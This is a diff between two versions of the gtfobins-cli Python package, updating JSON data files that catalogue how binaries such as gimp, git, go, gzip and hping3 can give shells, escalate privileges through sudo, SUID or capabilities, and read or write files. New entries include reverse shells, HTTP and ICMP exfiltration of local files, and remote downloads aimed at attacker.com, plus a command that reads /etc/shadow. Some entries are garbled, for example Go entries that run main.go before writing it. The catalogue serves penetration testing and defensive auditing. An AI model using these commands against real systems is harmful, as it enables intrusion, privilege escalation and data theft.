gtfobins-cli 1.0.0__py3-none-any.whl → 1.1.0__py3-none-any.whl

gtfo/data/ghc.json

@@ -2,12 +2,14 @@
   "functions": {
     "shell": [
       {
-        "code": "ghc -e 'System.Process.callCommand \"/bin/sh\"'"
+        
+        "code": "ghc -e 'System.Process.callCommand \"/bin/sh\"'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'"
+        
+        "code": "sudo ghc -e 'System.Process.callCommand \"/bin/sh\"'\n"
       }
     ]
   }

gtfo/data/ghci.json

@@ -2,11 +2,13 @@
   "functions": {
     "shell": [
       {
+        
         "code": "ghci\nSystem.Process.callCommand \"/bin/sh\"\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo ghci\nSystem.Process.callCommand \"/bin/sh\"\n"
       }
     ]

gtfo/data/gimp.json

@@ -1,57 +1,62 @@
 {
-  "description": "The binary hangs after executing the Python code and can be terminated pressing 'ctrl-c'.",
   "functions": {
     "shell": [
       {
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
+        
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'\n"
       }
     ],
     "reverse-shell": [
       {
-        "description": "Run 'socat file:`tty`,raw,echo=0 tcp-listen:[port]' on the attacker box to receive the shell.",
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys,socket,os,pty;s=socket.socket()\ns.connect((\"[host]\", [port]))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
+        "description": "Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\ngimp -idf --batch-interpreter=python-fu-eval -b 'import sys,socket,os,pty;s=socket.socket()\ns.connect((os.getenv(\"RHOST\"),int(os.getenv(\"RPORT\"))))\n[os.dup2(s.fileno(),fd) for fd in (0,1,2)]\npty.spawn(\"/bin/sh\")'\n"
       }
     ],
     "file-upload": [
       {
-        "description": "Send local file via 'd' parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(\"[url]\", bytes(u.urlencode({\"d\":open(\"[file]\").read()}).encode()))'\n"
+        "description": "Send local file via \"d\" parameter of a HTTP POST request. Run an HTTP service on the attacker box to collect the file.",
+        "code": "export URL=http://attacker.com/\nexport LFILE=file_to_send\ngimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r, urllib.parse as u\nelse: import urllib as u, urllib2 as r\nr.urlopen(e[\"URL\"], bytes(u.urlencode({\"d\":open(e[\"LFILE\"]).read()}).encode()))'\n"
       },
       {
         "description": "Serve files in the local folder running an HTTP server.",
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", [port]), s.SimpleHTTPRequestHandler).serve_forever()'\n"
+        "code": "export LPORT=8888\ngimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e\nif sys.version_info.major == 3: import http.server as s, socketserver as ss\nelse: import SimpleHTTPServer as s, SocketServer as ss\nss.TCPServer((\"\", int(e[\"LPORT\"])), s.SimpleHTTPRequestHandler).serve_forever()'\n"
       }
     ],
     "file-download": [
       {
         "description": "Fetch a remote file via HTTP GET request.",
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'import sys;\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(\"[url]\", \"[file]\")'\n"
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\ngimp -idf --batch-interpreter=python-fu-eval -b 'import sys; from os import environ as e\nif sys.version_info.major == 3: import urllib.request as r\nelse: import urllib as r\nr.urlretrieve(e[\"URL\"], e[\"LFILE\"])'\n"
       }
     ],
     "file-write": [
       {
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'open(\"[file]\", \"wb\").write(\"DATA\")'\n"
+        
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'open(\"file_to_write\", \"wb\").write(\"DATA\")'\n"
       }
     ],
     "file-read": [
       {
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'print(open(\"[file]\").read())'"
+        
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'print(open(\"file_to_read\").read())'\n"
       }
     ],
     "library-load": [
       {
-        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'"
+        
+        "code": "gimp -idf --batch-interpreter=python-fu-eval -b 'from ctypes import cdll; cdll.LoadLibrary(\"lib.so\")'\n"
       }
     ],
     "suid": [
       {
-        "code": "./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'"
+        
+        "code": "./gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.execl(\"/bin/sh\", \"sh\", \"-p\")'\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'"
+        
+        "code": "sudo gimp -idf --batch-interpreter=python-fu-eval -b 'import os; os.system(\"sh\")'\n"
       }
     ]
   }
-}
+}

gtfo/data/ginsh.json

@@ -0,0 +1,22 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "ginsh\n!/bin/sh\n"
+      }
+    ],
+    "limited-suid": [
+      {
+        
+        "code": "./ginsh\n!/bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo ginsh\n!/bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/git.json

@@ -2,53 +2,64 @@
   "functions": {
     "shell": [
       {
-        "code": "PAGER='sh -c \"exec sh 0<&1\"' git -p help"
+        
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' git -p help\n"
       },
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "git help config\n!/bin/sh\n"
       },
       {
-        "description": "The help system can also be reached from any 'git' command, e.g., 'git branch'. This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "git branch --help config\n!/bin/sh\n"
       },
       {
-        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the 'pre-commit' action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the '-C' option.",
+        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.",
         "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\ngit -C \"$TF\" commit --allow-empty -m x\n"
       },
       {
+        
         "code": "TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\ngit \"--exec-path=$TF\" x\n"
       }
     ],
     "file-read": [
       {
-        "description": "The read file content is displayed in 'diff' style output format.",
-        "code": "git diff /dev/null [file]\n"
+        "description": "The read file content is displayed in `diff` style output format.",
+        "code": "LFILE=file_to_read\ngit diff /dev/null $LFILE\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "The patch can be created locally by creating the file that will be written on the target using its absolute path, then `git diff /dev/null /path/to/file >x.patch`.",
+        "code": "git apply --unsafe-paths --directory / x.patch\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help"
+        
+        "code": "sudo PAGER='sh -c \"exec sh 0<&1\"' git -p help\n"
       },
       {
-        "description": "This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo git -p help config\n!/bin/sh\n"
       },
       {
-        "description": "The help system can also be reached from any 'git' command, e.g., 'git branch'. This invokes the default pager, which is likely to be 'less', other functions may apply.",
+        "description": "The help system can also be reached from any `git` command, e.g., `git branch`. This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.",
         "code": "sudo git branch --help config\n!/bin/sh\n"
       },
       {
-        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the 'pre-commit' action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the '-C' option.",
+        "description": "Git hooks are merely shell scripts and in the following example the hook associated to the `pre-commit` action is used. Any other hook will work, just make sure to be able perform the proper action to trigger it. An existing repository can also be used and moving into the directory works too, i.e., instead of using the `-C` option.",
         "code": "TF=$(mktemp -d)\ngit init \"$TF\"\necho 'exec /bin/sh 0<&2 1>&2' >\"$TF/.git/hooks/pre-commit.sample\"\nmv \"$TF/.git/hooks/pre-commit.sample\" \"$TF/.git/hooks/pre-commit\"\nsudo git -C \"$TF\" commit --allow-empty -m x\n"
       },
       {
+        
         "code": "TF=$(mktemp -d)\nln -s /bin/sh \"$TF/git-x\"\nsudo git \"--exec-path=$TF\" x\n"
       }
     ],
     "limited-suid": [
       {
-        "code": "PAGER='sh -c \"exec sh 0<&1\"' ./git -p help"
+        
+        "code": "PAGER='sh -c \"exec sh 0<&1\"' ./git -p help\n"
       }
     ]
   }

gtfo/data/gnuplot.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "sudo": [
+      {
+        "description": "",
+        "code": "COMMAND=id\nsudo gnuplot -e 'set print \"-\" ; print system(\"'$COMMAND'\")'\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_read\nsudo gnuplot -e 'set print \"-\" ; print system(\"cat '$LFILE'\")'\n"
+      }
+    ]
+  }
+}

gtfo/data/go.json

@@ -0,0 +1,58 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "cat > main.go << 'EOF'\npackage main\n\nimport (\n    \"os\"\n    \"os/exec\"\n)\n\nfunc main() {\n    cmd := exec.Command(\"/bin/sh\")\n    cmd.Stdin = os.Stdin\n    cmd.Stdout = os.Stdout\n    cmd.Stderr = os.Stderr\n    cmd.Run()\n}\nEOF\ngo run main.go\n"
+      }
+    ],
+    "reverse-shell": [
+      {
+        "description": "Run ``nc -lvnp 12345`` on the attacker box to receive the shell.",
+        "code": "export RHOST=attacker.com\nexport RPORT=12345\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"net\"\n    \"os\"\n    \"os/exec\"\n)\n\nfunc main() {\n    c, _ := net.Dial(\"tcp\", os.Getenv(\"RHOST\")+\":\"+os.Getenv(\"RPORT\"))\n    cmd := exec.Command(\"/bin/sh\")\n    cmd.Stdin, cmd.Stdout, cmd.Stderr = c, c, c\n    cmd.Run()\n}\nEOF\ngo run main.go\n"
+      }
+    ],
+    "file-upload": [
+      {
+        "description": "Send local file via HTTP POST request.",
+        "code": "export URL=http://attacker.com/upload\nexport LFILE=file_to_send\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"bytes\"\n    \"net/http\"\n    \"os\"\n)\n\nfunc main() {\n    data, _ := os.ReadFile(os.Getenv(\"LFILE\"))\n    http.Post(os.Getenv(\"URL\"), \"application/octet-stream\", bytes.NewReader(data))\n}\nEOF\ngo run main.go\n"
+      }
+    ],
+    "file-download": [
+      {
+        "description": "Fetch a remote file via HTTP GET request.",
+        "code": "export URL=http://attacker.com/file_to_get\nexport LFILE=file_to_save\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"io\"\n    \"net/http\"\n    \"os\"\n)\n\nfunc main() {\n    r, _ := http.Get(os.Getenv(\"URL\"))\n    defer r.Body.Close()\n    f, _ := os.Create(os.Getenv(\"LFILE\"))\n    defer f.Close()\n    io.Copy(f, r.Body)\n}\nEOF\ngo run main.go\n"
+      }
+    ],
+    "file-write": [
+      {
+        "description": "",
+        "code": "cat > main.go << 'EOF'\npackage main\n\nimport \"os\"\n\nfunc main() {\n    os.WriteFile(\"file_to_write\", []byte(\"DATA\"), 0644)\n}\nEOF\ngo run main.go\n"
+      }
+    ],
+    "file-read": [
+      {
+        "description": "",
+        "code": "export LFILE=file_to_read\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"fmt\"\n    \"os\"\n)\n\nfunc main() {\n    data, _ := os.ReadFile(os.Getenv(\"LFILE\"))\n    fmt.Print(string(data))\n}\nEOF\ngo run main.go\n"
+      }
+    ],
+    "suid": [
+      {
+        "description": "",
+        "code": "./go run main.go\n# with the `main.go` containing:\n# os/exec to spawn sh with -p\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"os\"\n    \"os/exec\"\n)\n\nfunc main() {\n    cmd := exec.Command(\"/bin/sh\", \"-p\")\n    cmd.Stdin = os.Stdin\n    cmd.Stdout = os.Stdout\n    cmd.Stderr = os.Stderr\n    cmd.Run()\n}\nEOF\n./go run main.go\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo go run main.go\n# with main.go containing:\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"os\"\n    \"os/exec\"\n)\n\nfunc main() {\n    cmd := exec.Command(\"/bin/sh\")\n    cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr\n    cmd.Run()\n}\nEOF\nsudo go run main.go\n"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "",
+        "code": "./go run main.go\n# binary must have CAP_SETUID set\ncat > main.go << 'EOF'\npackage main\n\nimport (\n    \"os\"\n    \"os/exec\"\n    \"syscall\"\n)\n\nfunc main() {\n    syscall.Setuid(0)\n    cmd := exec.Command(\"/bin/sh\")\n    cmd.Stdin, cmd.Stdout, cmd.Stderr = os.Stdin, os.Stdout, os.Stderr\n    cmd.Run()\n}\nEOF\n./go run main.go\n"
+      }
+    ]
+  }
+}

gtfo/data/grc.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        
+        "code": "grc --pty /bin/sh\n"
+      }
+    ],
+    "sudo": [
+      {
+        
+        "code": "sudo grc --pty /bin/sh\n"
+      }
+    ]
+  }
+}

gtfo/data/grep.json

@@ -1,20 +1,22 @@
 {
-  "description": "There are many 'grep' flavors that in many cases are just copies, symlinks or wrappers around the original binary that may share the same behavior, for example: 'egrep', 'fgrep', 'zgrep', etc.\n",
   "functions": {
     "file-read": [
       {
-        "code": "grep '' [file]\n"
+        
+        "code": "LFILE=file_to_read\ngrep '' $LFILE\n"
       }
     ],
     "suid": [
       {
-        "code": "./grep '' [file]\n"
+        
+        "code": "LFILE=file_to_read\n./grep '' $LFILE\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo grep '' [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo grep '' $LFILE\n"
       }
     ]
   }
-}
+}

gtfo/data/gtester.json

@@ -1,19 +1,28 @@
 {
   "functions": {
+    "file-write": [
+      {
+        "description": "Data to be written appears in an XML attribute in the output file (`<testbinary path=\"DATA\">`).",
+        "code": "LFILE=file_to_write\ngtester \"DATA\" -o $LFILE\n"
+      }
+    ],
     "shell": [
       {
+        
         "code": "TF=$(mktemp)\necho '#!/bin/sh' > $TF\necho 'exec /bin/sh -p 0<&1' >> $TF\nchmod +x $TF\ngtester -q $TF\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "TF=$(mktemp)\necho '#!/bin/sh' > $TF\necho 'exec /bin/sh 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n"
       }
     ],
     "suid": [
       {
+        
         "code": "TF=$(mktemp)\necho '#!/bin/sh -p' > $TF\necho 'exec /bin/sh -p 0<&1' >> $TF\nchmod +x $TF\nsudo gtester -q $TF\n"
       }
     ]
   }
-}
+}

gtfo/data/guile.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "guile -c '(system \"sh\")'\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo guile -c '(system \"sh\")'\n"
+      }
+    ]
+  }
+}

gtfo/data/gzip.json

@@ -1,22 +1,31 @@
 {
-  "description": "There are also a number of other utilities that rely on 'gzip' under the hood, e.g., 'zless', 'zcat', 'gunzip', etc. Besides having similar features, they also allow privileged reads if 'gzip' itself is SUID.",
   "functions": {
     "file-read": [
       {
-        "code": "gzip -f [file] -t\n"
+        
+        "code": "LFILE=file_to_read\ngzip -f $LFILE -t\n"
       },
       {
-        "code": "gzip -c [file] | gzip -d\n"
+        
+        "code": "LFILE=file_to_read\ngzip -c $LFILE | gzip -d\n"
       }
     ],
     "suid": [
       {
-        "code": "./gzip -f [file] -t\n"
+        
+        "code": "LFILE=file_to_read\n./gzip -f $LFILE -t\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo gzip -f [file] -t\n"
+        
+        "code": "LFILE=file_to_read\nsudo gzip -f $LFILE -t\n"
+      }
+    ],
+    "capabilities": [
+      {
+        "description": "If cap_dac_read_search is set. Run ``getcap -r / 2>/dev/null`` to confirm ``/usr/bin/gzip cap_dac_read_search=ep``",
+        "code": "gzip can read any file:\ngzip -c /etc/shadow > /tmp/shadow.gz\ngzip -d /tmp/shadow.gz\ncat /tmp/shadow\n"
       }
     ]
   }

gtfo/data/hashcat.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "file-write": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_write\necho -n \"DATA\" > wordlist && echo -n \"DATA\" | md5sum | awk '{print $1}' > hash\nhashcat -m 0 -a 0 --quiet --potfile-disable -o \"$LFILE\" --outfile-format=2 --outfile-autohex-disable hash wordlist\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "LFILE=file_to_write\necho -n \"DATA\" > wordlist && echo -n \"DATA\" | md5sum | awk '{print $1}' > hash\nsudo hashcat -m 0 -a 0 --quiet --potfile-disable -o \"$LFILE\" --outfile-format=2 --outfile-autohex-disable hash wordlist\n"
+      }
+    ]
+  }
+}

gtfo/data/hd.json

@@ -1,20 +1,22 @@
 {
-  "description": "The output is a hex dump.",
   "functions": {
     "file-read": [
       {
-        "code": "hd \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nhd \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./hd \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./hd \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo hd \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo hd \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/head.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "head -c1G [file]\n"
+        
+        "code": "LFILE=file_to_read\nhead -c1G \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./head -c1G [file]\n"
+        
+        "code": "LFILE=file_to_read\n./head -c1G \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo head -c1G [file]\n"
+        
+        "code": "LFILE=file_to_read\nsudo head -c1G \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/hexdump.json

@@ -1,20 +1,22 @@
 {
-  "description": "The output is a hex dump.",
   "functions": {
     "file-read": [
       {
-        "code": "hexdump -C \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nhexdump -C \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./hexdump -C \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./hexdump -C \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo hexdump -C \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo hexdump -C \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/hg.json

@@ -0,0 +1,16 @@
+{
+  "functions": {
+    "shell": [
+      {
+        "description": "",
+        "code": "hg --config alias.root='!sh' root\n"
+      }
+    ],
+    "sudo": [
+      {
+        "description": "",
+        "code": "sudo hg --config alias.root='!sh' root\n"
+      }
+    ]
+  }
+}

gtfo/data/highlight.json

@@ -2,18 +2,21 @@
   "functions": {
     "file-read": [
       {
-        "code": "highlight --no-doc --failsafe \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nhighlight --no-doc --failsafe \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./highlight --no-doc --failsafe \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./highlight --no-doc --failsafe \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "sudo highlight --no-doc --failsafe \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\nsudo highlight --no-doc --failsafe \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/hping3.json

@@ -2,17 +2,24 @@
   "functions": {
     "shell": [
       {
+        
         "code": "hping3\n/bin/sh\n"
       }
     ],
     "suid": [
       {
+        
         "code": "./hping3\n/bin/sh -p\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo hping3\n/bin/sh\n"
+      },
+      {
+        "description": "The file is continuously sent, adjust the `--count` parameter or kill the sender when done. Receive on the attacker box with:\n\n```\nsudo hping3 --icmp --listen xxx --dump\n```\n",
+        "code": "RHOST=attacker.com\nLFILE=file_to_read\nsudo hping3 \"$RHOST\" --icmp --data 500 --sign xxx --file \"$LFILE\"\n"
       }
     ]
   }

gtfo/data/iconv.json

@@ -1,25 +1,28 @@
 {
-  "description": "The '8859_1' encoding is used as it accepts any single-byte sequence, thus it allows to read/write arbitrary files. Other encoding combinations may corrupt the result.",
   "functions": {
     "file-write": [
       {
-        "code": "echo \"DATA\" | iconv -f 8859_1 -t 8859_1 -o \"[file]\"\n"
+        
+        "code": "LFILE=file_to_write\necho \"DATA\" | iconv -f 8859_1 -t 8859_1 -o \"$LFILE\"\n"
       }
     ],
     "file-read": [
       {
-        "code": "iconv -f 8859_1 -t 8859_1 \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\niconv -f 8859_1 -t 8859_1 \"$LFILE\"\n"
       }
     ],
     "suid": [
       {
-        "code": "./iconv -f 8859_1 -t 8859_1 \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 \"$LFILE\"\n"
       }
     ],
     "sudo": [
       {
-        "code": "./iconv -f 8859_1 -t 8859_1 \"[file]\"\n"
+        
+        "code": "LFILE=file_to_read\n./iconv -f 8859_1 -t 8859_1 \"$LFILE\"\n"
       }
     ]
   }
-}
+}

gtfo/data/iftop.json

@@ -1,18 +1,20 @@
 {
-  "description": "This requires 'iftop' 0.17 and the privilege to capture on some device (specify with '-i' if needed) .",
   "functions": {
     "shell": [
       {
+        
         "code": "iftop\n!/bin/sh\n"
       }
     ],
     "limited-suid": [
       {
+        
         "code": "./iftop\n!/bin/sh\n"
       }
     ],
     "sudo": [
       {
+        
         "code": "sudo iftop\n!/bin/sh\n"
       }
     ]